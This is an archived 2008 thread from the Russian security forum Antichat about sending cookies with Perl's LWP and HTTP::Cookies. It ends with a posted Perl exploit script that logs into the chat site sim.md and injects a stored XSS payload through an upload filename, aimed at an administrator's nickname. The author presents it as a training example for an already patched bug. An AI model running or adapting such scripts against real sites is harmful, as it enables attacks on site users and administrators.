ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
30.05.2008, 05:03
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748
Репутация:
137
|
|
slider спасибо теперь работает
|
|
|
30.05.2008, 05:12
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748
Репутация:
137
|
|
а вот в какую переменную прописывать куки ?( я хочу тправить пост запрос с куами . вот например)
Код:
POST http://mail.rambler.ru/script/auth.cgi HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.rambler.ru/
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.8 (build 01709))
Host: mail.rambler.ru
Content-Length: 41
Pragma: no-cache
Cookie: ruid=UH0LBmW3KkhuFgEAARCXgwB=
domain=rambler.ru&url=7&login=zz&passw=zz
куда ruid=UH0LBmW3KkhuFgEAARCXgwB= прописывать? |
|
|
|
30.05.2008, 11:17
|
|
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499
Репутация:
3702
|
|
ZET36
Так они ж у тебя и так прописаны.
Код:
POST http://mail.rambler.ru/script/auth.cgi HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.rambler.ru/
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.8 (build 01709))
Host: mail.rambler.ru
Content-Length: 41
Pragma: no-cache
Cookie: ruid=UH0LBmW3KkhuFgEAARCXgwB=
domain=rambler.ru&url=7&login=zz&passw=zz
|
|
|
|
30.05.2008, 11:28
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748
Репутация:
137
|
|
Solide Snake это запрос из навископа, я хочу отправить точно такой же запрос через перл, куда в скрипт мне прописывать куки я спрашивал
|
|
|
|
30.05.2008, 11:39
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
ZET36
$cookie_jar->set_cookie( $version, $key, $val, $path, $domain, $port, $path_spec, $secure, $maxage, $discard, \%rest )
The set_cookie() method updates the state of the $cookie_jar. The $key, $val, $domain, $port and $path arguments are strings. The $path_spec, $secure, $discard arguments are boolean values. The $maxage value is a number indicating number of seconds that this cookie will live. A value <= 0 will delete this cookie. %rest defines various other attributes like "Comment" and "CommentURL".
|
|
|
|
30.05.2008, 13:42
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748
Репутация:
137
|
|
krypt3r хых прежде чем задать этот вопрос я гуглил и просмотрел кучу статей типо
http://cylib.iit.nau.edu.ua/Books/Prog/Perl/ActivePerl_Help/site/lib/HTTP/Cookies.html
но в английском я не очень силён, и при том не так хорошо знаю перл что бы разобраься в отрывках кода, поэтому и задал вопрос что бы посмотреть как это выглядит на примере
|
|
|
|
30.05.2008, 15:03
|
|
Постоянный
Регистрация: 03.08.2007
Сообщений: 367
Провел на форуме:
876216
Репутация:
209
|
|
Хм...а в чем проблема просто, напрямую в файл писать? Или я чето не понял? =\
|
|
|
|
30.05.2008, 15:57
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748
Репутация:
137
|
|
biophreak конешно это не проблема , содержимое файла вывести в переменную массива очень легко, просто я поинтересовался правильно ли я понял содержимое скрипта
|
|
|
|
30.05.2008, 17:01
|
|
Постоянный
Регистрация: 03.08.2007
Сообщений: 367
Провел на форуме:
876216
Репутация:
209
|
|
А сорри, не увидел, да, действительно, юзать file => "файл с куками.txt" будет имхо правильнее  |
|
|
|
31.05.2008, 09:16
|
|
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559
Репутация:
2947
|
|
Кхмм.... когда то меня мучал этот же вопрос.....
могу дать как пример.. на изучение один сплойт для чата "h t t p : / / s i m . m d"
который я писал для себя, для тренеровок ... багу уже конечно прикрыли.. но я надеюсь что реализация
всего этого ... будет кому то инересна.... хех.. а возможно для кого то станет хорошей тренировочной куклой
PHP код:
#!/usr/bin/perl
########################################
## Сoded by slider
## http://forum.antichat.ru
## _____________________
## Victim:
## http://sim.md/
########################################
use IO::Socket;
use LWP::UserAgent;
use HTTP::Cookies;
#######_АВТОРИЗАЦИЯ_#######
$a_login = 'Логин';
$a_pass = 'Пароль';
#########################
$victim = 'Администратор'; # НИК ЖЕРТВЫ
$ploent = '<BODY ONLOAD=alert("XSS")>';
#########################
$ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(POST => 'http://sim.md/login.php');
my $cookie_jar = HTTP::Cookies->new;
$ua->timeout(60);
$ua->cookie_jar($cookie_jar);
$req->content("login=$a_login&password=$a_pass&tochat=1");
$req->content_type('application/x-www-form-urlencoded');
$req->referer('http://sim.md/');
my $res = $ua->request($req);
if ($res->status_line=~'302'==1)
{print "[~] Auth: OK\n"};
$req = HTTP::Request->new(GET => 'http://sim.md/chat.php');
$req->header('Accept' => 'text/html');
$req->referer('http://sim.md/login.php');
$res = $ua->request($req);
$cook = $cookie_jar->as_string;
@res_arr = split(/\n/, $cook);
$cookies = '';
foreach (@res_arr)
{if (/^Set-Cookie3: ([^;]*);(.*)/){
$cookies = $1; chomp($cookies);}}
$a=q(POST http://sim.md/records.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://sim.md/records.php
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d7186135506dc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
Host: sim.md
Content-Length: 812
Pragma: no-cache
Cookie: );$b=qq($cookies
-----------------------------7d7186135506dc
Content-Disposition: form-data; name="action"
send
-----------------------------7d7186135506dc
Content-Disposition: form-data; name="name"
$victim
-----------------------------7d7186135506dc
Content-Disposition: form-data; name="msg"
-----------------------------7d7186135506dc
Content-Disposition: form-data; name="file"; filename="$ploent"
Content-Type: application/octet-stream
-----------------------------7d7186135506dc
Content-Disposition: form-data; name="forward"
-----------------------------7d7186135506dc--
);
$pack=$a.$b;
my $h_sock = new IO::Socket::INET (PeerAddr => "sim.md", PeerPort => '80', PeerProto => 'TCP' ) or die "[-] Exploit Failed";
print $h_sock $pack;
print "[~] Success ...\n";
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид